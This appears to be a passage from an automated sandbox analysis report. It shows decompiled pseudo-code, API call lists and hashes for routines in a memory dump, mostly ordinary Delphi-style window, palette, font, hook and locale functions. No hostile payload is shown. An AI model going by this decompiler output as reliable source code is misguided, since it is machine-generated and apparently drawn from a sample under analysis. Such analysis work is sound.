                                            • Instruction ID: 053bfd254ae03c1120eed4af9aaa1073b67a29ff1d1e7bedf34a79a2d11777e7
                                            • Opcode Fuzzy Hash: 288377c376e87868179458a7bd4f33ed8b56888c0567d43e533f4a2ac605fd36
                                            • Instruction Fuzzy Hash: BC314BE165E3C49FD760DBACAC01F7D37D9EB92340F044052F4888B2A2D7359944EB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00962020, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00962020(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				intOrPtr _t59;
				struct HDC__* _t69;
				void* _t70;
				intOrPtr _t79;
				void* _t84;
				struct HPALETTE__* _t85;
				intOrPtr _t87;
				intOrPtr _t89;

				_t87 = _t89;
				_push(_t70);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E00960248(_v8);
					_push(_t87);
					_push(0x9620ff);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					E0096333C( *((intOrPtr*)(_v8 + 0x58)));
					E00961E9C( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					E0096343C( *((intOrPtr*)(_v8 + 0x58)));
					_t69 = CreateCompatibleDC(0);
					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t84 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
					}
					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
					if(_t85 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
						RealizePalette(_t69);
					}
					E0096053C(_v8, _t69);
					_t59 =  *0x99a6ec; // 0xf00acc
					E00956F6C(_t59, _t69, _t70, _v8, _t85);
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x962106);
					return E009603B4(_v8);
				}
			}

















                                            0x00962021
                                            0x00962023
                                            0x00962026
                                            0x00962029
                                            0x00962030
                                            0x0096210a
                                            0x00962036
                                            0x00962039
                                            0x00962040
                                            0x00962041
                                            0x00962046
                                            0x00962049
                                            0x00962052
                                            0x00962063
                                            0x0096206e
                                            0x0096207a
                                            0x00962085
                                            0x0096208a
                                            0x009620a0
                                            0x0096208c
                                            0x00962096
                                            0x00962096
                                            0x009620ac
                                            0x009620b1
                                            0x009620cf
                                            0x009620b3
                                            0x009620bf
                                            0x009620c3
                                            0x009620c3
                                            0x009620d7
                                            0x009620df
                                            0x009620e4
                                            0x009620eb
                                            0x009620ee
                                            0x009620f1
                                            0x009620fe
                                            0x009620fe

                                            APIs
                                              • Part of subcall function 00960248: RtlEnterCriticalSection.KERNEL32(0099C8C8,00000000,0095ECF6,00000000,0095ED55), ref: 00960250
                                              • Part of subcall function 00960248: RtlLeaveCriticalSection.KERNEL32(0099C8C8,0099C8C8,00000000,0095ECF6,00000000,0095ED55), ref: 0096025D
                                              • Part of subcall function 00960248: RtlEnterCriticalSection.KERNEL32(00000038,0099C8C8,0099C8C8,00000000,0095ECF6,00000000,0095ED55), ref: 00960266
                                              • Part of subcall function 00961E9C: SetRectEmpty.USER32 ref: 00961EE9
                                              • Part of subcall function 0096343C: GetDC.USER32 ref: 00963492
                                              • Part of subcall function 0096343C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 009634A7
                                              • Part of subcall function 0096343C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 009634B1
                                              • Part of subcall function 0096343C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00962073,00000000,009620FF), ref: 009634D5
                                              • Part of subcall function 0096343C: ReleaseDC.USER32 ref: 009634E0
                                            • CreateCompatibleDC.GDI32(00000000), ref: 00962075
                                            • SelectObject.GDI32(00000000,?), ref: 0096208E
                                            • SelectPalette.GDI32(00000000,?,000000FF), ref: 009620B7
                                            • RealizePalette.GDI32(00000000), ref: 009620C3
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleEmptyHalftoneLeaveObjectRealizeRectRelease
                                            • String ID:
                                            • API String ID: 1827072975-0
                                            • Opcode ID: cb0a80da0aed5fffe77018b918138c3e61335f6b4ca1fd36703b867b9effcfec
                                            • Instruction ID: 55c1b1e3334fffc9e90eb383e7d822a940d14bb850a745e7e901e5af259f642a
                                            • Opcode Fuzzy Hash: cb0a80da0aed5fffe77018b918138c3e61335f6b4ca1fd36703b867b9effcfec
                                            • Instruction Fuzzy Hash: 2E31F774A04658EFD704EB59C981E5EB7F9EF89720B6245A1F8049B362D730EE40DB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04577F66, Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                            Download Yara Rule
                                            APIs
                                            • __RTC_Initialize.LIBCMT ref: 04577FB3
                                            • ___scrt_initialize_default_local_stdio_options.LIBCMT ref: 04577FBD
                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0457801D
                                            • ___scrt_fastfail.LIBCMT ref: 0457805D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.284544934.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: false
                                            Similarity
                                            • API ID: Initialize___scrt_fastfail___scrt_initialize_default_local_stdio_options___scrt_is_nonwritable_in_current_image
                                            • String ID:
                                            • API String ID: 2705677121-0
                                            • Opcode ID: 592edd16f87f0ae077bd67b1ff130c49e5fc7be54897f110c07cc8af03c47a03
                                            • Instruction ID: 66e9fab1ca81a3c9bff252ca8958a02f900e2e55513cbaa1e5ca0e459a870779
                                            • Opcode Fuzzy Hash: 592edd16f87f0ae077bd67b1ff130c49e5fc7be54897f110c07cc8af03c47a03
                                            • Instruction Fuzzy Hash: 5111D33154920799FF10BB75BC1CB9C2760BF963ADF004439D48517281DB267545F636
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0095D774, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E0095D774(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x99c668; // 0x940000
				 *0x99a41c = _t6;
				_t8 =  *0x99a430; // 0x95d764
				_t9 =  *0x99c668; // 0x940000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L009466DC != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x99c668; // 0x940000
						_t20 =  *0x99a430; // 0x95d764
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x99a40c);
				}
				_t13 =  *0x99c668; // 0x940000
				_t24 =  *0x99a430; // 0x95d764
				_t22 = E00946BEC(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E0095D6B8(_a4, _a8));
				}
				return _t22;
			}














                                            0x0095d77b
                                            0x0095d780
                                            0x0095d789
                                            0x0095d78f
                                            0x0095d795
                                            0x0095d79d
                                            0x0095d79f
                                            0x0095d7a2
                                            0x0095d7b0
                                            0x0095d7b2
                                            0x0095d7b8
                                            0x0095d7be
                                            0x0095d7be
                                            0x0095d7c8
                                            0x0095d7c8
                                            0x0095d7de
                                            0x0095d7eb
                                            0x0095d7fb
                                            0x0095d802
                                            0x0095d813
                                            0x0095d813
                                            0x0095d81e

                                            APIs
                                            • GetClassInfoA.USER32 ref: 0095D795
                                            • UnregisterClassA.USER32 ref: 0095D7BE
                                            • RegisterClassA.USER32 ref: 0095D7C8
                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0095D813
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                            • String ID:
                                            • API String ID: 4025006896-0
                                            • Opcode ID: db287a035d37283af45a27797e5cf6774098525cd57c613ef51ba5defcd4f7f9
                                            • Instruction ID: 196fc5088337595550733130e673f96f95cc6fad36c5ea2c9e0ba4e13587e78a
                                            • Opcode Fuzzy Hash: db287a035d37283af45a27797e5cf6774098525cd57c613ef51ba5defcd4f7f9
                                            • Instruction Fuzzy Hash: 050196F17692046BDB20EFACDD85F9A339CE78D709F104212F904D72A1DA71D844D7A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00941A3C, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 67%
                                            			E00941A3C() {
				signed int _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00941AF2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x99c5cc);
				L00941390();
				if( *0x99c04d != 0) {
					_push(0x99c5cc);
					L00941398();
				}
				E00941400(0x99c5ec);
				E00941400(0x99c5fc);
				E00941400(0x99c628);
				 *0x99c624 = LocalAlloc(0, 0xff8);
				if( *0x99c624 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x99c624; // 0xa41ea0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x99c610)) = 0x99c60c;
					 *0x99c60c = 0x99c60c;
					 *0x99c618 = 0x99c60c;
					 *0x99c5c4 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00941AF9);
				if( *0x99c04d != 0) {
					_push(0x99c5cc);
					L009413A0();
					return 0;
				}
				return 0;
			}







                                            0x00941a41
                                            0x00941a42
                                            0x00941a47
                                            0x00941a4a
                                            0x00941a4d
                                            0x00941a52
                                            0x00941a5e
                                            0x00941a60
                                            0x00941a65
                                            0x00941a65
                                            0x00941a6f
                                            0x00941a79
                                            0x00941a83
                                            0x00941a94
                                            0x00941aa0
                                            0x00941aa2
                                            0x00941aa7
                                            0x00941aa7
                                            0x00941aaf
                                            0x00941ab3
                                            0x00941ab4
                                            0x00941ac0
                                            0x00941ac3
                                            0x00941ac5
                                            0x00941aca
                                            0x00941aca
                                            0x00941ad3
                                            0x00941ad6
                                            0x00941ad9
                                            0x00941ae5
                                            0x00941ae7
                                            0x00941aec
                                            0x00000000
                                            0x00941aec
                                            0x00941af1

                                            APIs
                                            • RtlInitializeCriticalSection.KERNEL32(0099C5CC,00000000,00941AF2,?,?,009422D6), ref: 00941A52
                                            • RtlEnterCriticalSection.KERNEL32(0099C5CC,0099C5CC,00000000,00941AF2,?,?,009422D6), ref: 00941A65
                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0099C5CC,00000000,00941AF2,?,?,009422D6), ref: 00941A8F
                                            • RtlLeaveCriticalSection.KERNEL32(0099C5CC,00941AF9,00000000,00941AF2,?,?,009422D6), ref: 00941AEC
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                            • String ID:
                                            • API String ID: 730355536-0
                                            • Opcode ID: 38cfd72c50c1ac14fc869767b195aa00469145c5571d71e207cd19aac570a6b3
                                            • Instruction ID: 53201211d61e238dcf590286d41562b1b45fc55ae8abaca2cb58786c32d1d515
                                            • Opcode Fuzzy Hash: 38cfd72c50c1ac14fc869767b195aa00469145c5571d71e207cd19aac570a6b3
                                            • Instruction Fuzzy Hash: C501C4F055D3015EE725AB6D9C06F253BC4D7C9349F018066F000C66E1D6B568C09B12
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096D3B8, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E0096D3B8(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x99cb28; // 0xf01290
					if(GlobalFindAtomA(E00944470(_t9)) !=  *0x99cb24) {
						_t16 = 0 | E0096C500(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x99cb24 & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}







                                            0x0096d3b8
                                            0x0096d3ba
                                            0x0096d3bb
                                            0x0096d3bd
                                            0x0096d3c1
                                            0x0096d3d8
                                            0x0096d3ef
                                            0x0096d40f
                                            0x0096d3f1
                                            0x0096d401
                                            0x0096d401
                                            0x0096d3ef
                                            0x0096d417

                                            APIs
                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0096D3C5
                                            • GetCurrentProcessId.KERNEL32(?,-0000000C,00000000,0096D430,0096D1F2,0099CB5C,00000000,0096CFE2,?,-0000000C,?), ref: 0096D3CE
                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 0096D3E3
                                            • GetPropA.USER32 ref: 0096D3FA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                            • String ID:
                                            • API String ID: 2582817389-0
                                            • Opcode ID: 0c000908a786cd0835df40c1b866ece60d89eff63c87d95d91222e5cc78f1cfd
                                            • Instruction ID: f78f5f3042acb70c41847bbf3a36b85c8603f5328104087fe6bca64383ce1eaa
                                            • Opcode Fuzzy Hash: 0c000908a786cd0835df40c1b866ece60d89eff63c87d95d91222e5cc78f1cfd
                                            • Instruction Fuzzy Hash: F3F065F271B2219796217B796D83F7F228C9E967603404032FC50C6566EE25EC82B1B7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096C534, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E0096C534(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x99cb2c; // 0xf012ac
					if(GlobalFindAtomA(E00944470(_t5)) !=  *0x99cb26) {
						_t15 = E0096C500(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0x99cb26 & 0x0000ffff);
					}
				}
				return _t15;
			}







                                            0x0096c534
                                            0x0096c536
                                            0x0096c537
                                            0x0096c539
                                            0x0096c53d
                                            0x0096c554
                                            0x0096c56b
                                            0x0096c586
                                            0x0096c56d
                                            0x0096c57b
                                            0x0096c57b
                                            0x0096c56b
                                            0x0096c58d

                                            APIs
                                            • GetWindowThreadProcessId.USER32(?), ref: 0096C541
                                            • GetCurrentProcessId.KERNEL32(?,?,?,00000000,00000000,0096D004,?,-0000000C,?), ref: 0096C54A
                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 0096C55F
                                            • GetPropA.USER32 ref: 0096C576
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                            • String ID:
                                            • API String ID: 2582817389-0
                                            • Opcode ID: d8c7eda250e9b75afa3fd78fa87c323937dd428047793950d75a07f348587754
                                            • Instruction ID: afe51a75e18f6aa62dd04e3a129ab5572dfa01be0809a48dbb764465f72af2f1
                                            • Opcode Fuzzy Hash: d8c7eda250e9b75afa3fd78fa87c323937dd428047793950d75a07f348587754
                                            • Instruction Fuzzy Hash: 7CF065D270932096D620BBBD6C82E3A228CCAA67903004523F882E7113D515DC4193B7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0098D29C, Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0098D29C(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x99cbb8; // 0xf01714
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x99cbd0 == 0) {
						_t2 = SetWindowsHookExA(3, 0x98d258, 0, GetCurrentThreadId());
						 *0x99cbd0 = _t2;
					}
					if( *0x99cbcc == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x99cbcc = _t2;
					}
					if( *0x99cbd4 == 0) {
						_t2 = CreateThread(0, 0x3e8,  &M0098D1FC, 0, 0, _t7);
						 *0x99cbd4 = _t2;
					}
				}
				return _t2;
			}





                                            0x0098d29d
                                            0x0098d2a9
                                            0x0098d2b2
                                            0x0098d2c4
                                            0x0098d2c9
                                            0x0098d2c9
                                            0x0098d2d5
                                            0x0098d2df
                                            0x0098d2e4
                                            0x0098d2e4
                                            0x0098d2f0
                                            0x0098d303
                                            0x0098d308
                                            0x0098d308
                                            0x0098d2f0
                                            0x0098d30e

                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 0098D2B4
                                            • SetWindowsHookExA.USER32 ref: 0098D2C4
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0098D2DF
                                            • CreateThread.KERNEL32 ref: 0098D303
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateThread$CurrentEventHookWindows
                                            • String ID:
                                            • API String ID: 1195359707-0
                                            • Opcode ID: fcbae0ac984cc362d830669c09502336601f4855ef8ac85548a70e691535ec42
                                            • Instruction ID: a0647327bbb2d1e496bf063663c79cbd4b1feda2b99552345562fcd311fb71c4
                                            • Opcode Fuzzy Hash: fcbae0ac984cc362d830669c09502336601f4855ef8ac85548a70e691535ec42
                                            • Instruction Fuzzy Hash: 38F0D4F07DA340BFF720BB68AC07F153798A792B16F100126F214A92D1C6F15884DB6A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0095F678, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E0095F678(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t100;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x95f801);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					__eflags = 0;
					 *[fs:eax] = 0;
					_push(0x95f808);
					return E00943FD4( &_v80, 3);
				} else {
					_t76 =  *0x99c8e0; // 0xf00a30
					E0095E9BC(_t76);
					_push(_t137);
					_push(0x95f7d9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E00944214( &_v72, _v8 + 0x1b,  *(_v8 + 0x19) & 0x00000008);
						_t100 = E00947E50(_v72, "Default");
						_t146 = _t100;
						if(_t100 != 0) {
							__eflags = _v8 + 0x1b;
							E00944214( &_v80, _v8 + 0x1b, _v8 + 0x1b);
							E00948660( &(_v68.lfFaceName), _v80);
						} else {
							E00944214( &_v76, "\rMS Sans Serif", _t146);
							E00948660( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E0095F95C(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x95f7e0);
					_t81 =  *0x99c8e0; // 0xf00a30
					return E0095E9C8(_t81);
				}
			}

















                                            0x0095f679
                                            0x0095f67b
                                            0x0095f681
                                            0x0095f684
                                            0x0095f687
                                            0x0095f68a
                                            0x0095f68e
                                            0x0095f68f
                                            0x0095f694
                                            0x0095f697
                                            0x0095f69d
                                            0x0095f6a7
                                            0x0095f7e6
                                            0x0095f7eb
                                            0x0095f7ee
                                            0x0095f800
                                            0x0095f6ad
                                            0x0095f6ad
                                            0x0095f6b2
                                            0x0095f6b9
                                            0x0095f6ba
                                            0x0095f6bf
                                            0x0095f6c2
                                            0x0095f6cc
                                            0x0095f6d8
                                            0x0095f6dd
                                            0x0095f6e2
                                            0x0095f6e7
                                            0x0095f6f1
                                            0x0095f6fc
                                            0x0095f6f3
                                            0x0095f6f3
                                            0x0095f6f3
                                            0x0095f70d
                                            0x0095f71a
                                            0x0095f727
                                            0x0095f730
                                            0x0095f73c
                                            0x0095f749
                                            0x0095f74e
                                            0x0095f750
                                            0x0095f772
                                            0x0095f775
                                            0x0095f780
                                            0x0095f752
                                            0x0095f75a
                                            0x0095f765
                                            0x0095f765
                                            0x0095f785
                                            0x0095f789
                                            0x0095f78d
                                            0x0095f798
                                            0x0095f79a
                                            0x0095f7a2
                                            0x0095f79c
                                            0x0095f79e
                                            0x0095f7a8
                                            0x0095f7a0
                                            0x0095f7ae
                                            0x0095f7ae
                                            0x0095f79e
                                            0x0095f7be
                                            0x0095f7be
                                            0x0095f7c3
                                            0x0095f7c6
                                            0x0095f7c9
                                            0x0095f7ce
                                            0x0095f7d8
                                            0x0095f7d8

                                            APIs
                                              • Part of subcall function 0095E9BC: RtlEnterCriticalSection.KERNEL32(?,0095E9F9), ref: 0095E9C0
                                            • CreateFontIndirectA.GDI32(?), ref: 0095F7B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateCriticalEnterFontIndirectSection
                                            • String ID: MS Sans Serif$Default
                                            • API String ID: 2931345757-2137701257
                                            • Opcode ID: fdd081618c94a4805c12f339f68cf6ed2c21f2b68782e6201ce2c026124cf74c
                                            • Instruction ID: 54941a84caf185b3bf10bd6fd30ad46233c685bf67023f5b572495a1afe9176d
                                            • Opcode Fuzzy Hash: fdd081618c94a4805c12f339f68cf6ed2c21f2b68782e6201ce2c026124cf74c
                                            • Instruction Fuzzy Hash: FF516A35A08248DFDB01DFA9C491BCEBBF6EF48314F6540A9E800A7352D3749E08DB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00949B24, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E00949B24(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x949c02);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00943FB0(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00944048( &_v8, 0x949c24);
				} else {
					E00944048( &_v8, 0x949c18);
				}
				_t32 = E00944470(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E00944220(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E009444D0( *_t49, E00944270( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(0x949c09);
				return E00943FB0( &_v8);
			}













                                            0x00949b31
                                            0x00949b34
                                            0x00949b36
                                            0x00949b3a
                                            0x00949b3b
                                            0x00949b40
                                            0x00949b43
                                            0x00949b48
                                            0x00949b54
                                            0x00949b5f
                                            0x00949b6a
                                            0x00949b71
                                            0x00949b8a
                                            0x00949b73
                                            0x00949b7b
                                            0x00949b7b
                                            0x00949b9e
                                            0x00949bb7
                                            0x00949bc6
                                            0x00949bcc
                                            0x00949be7
                                            0x00949be7
                                            0x00949bcc
                                            0x00949bee
                                            0x00949bf1
                                            0x00949bf4
                                            0x00949c01

                                            APIs
                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00949C02), ref: 00949BAA
                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00949C02), ref: 00949BB0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: DateFormatLocaleThread
                                            • String ID: yyyy
                                            • API String ID: 3303714858-3145165042
                                            • Opcode ID: d2b83d731afd5d42d82491ff52c3d98fdd3199a9e3175d47828596ef88be28da
                                            • Instruction ID: b772693861cb9cb4ed0eff96b2c7692ebd5b5a43026a87f3cf7cffcc2ab816d7
                                            • Opcode Fuzzy Hash: d2b83d731afd5d42d82491ff52c3d98fdd3199a9e3175d47828596ef88be28da
                                            • Instruction Fuzzy Hash: 93214F786046089BDB11EFA8D882FAEB3FCEF88700F5044A5F904D7351E6709E44C7A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

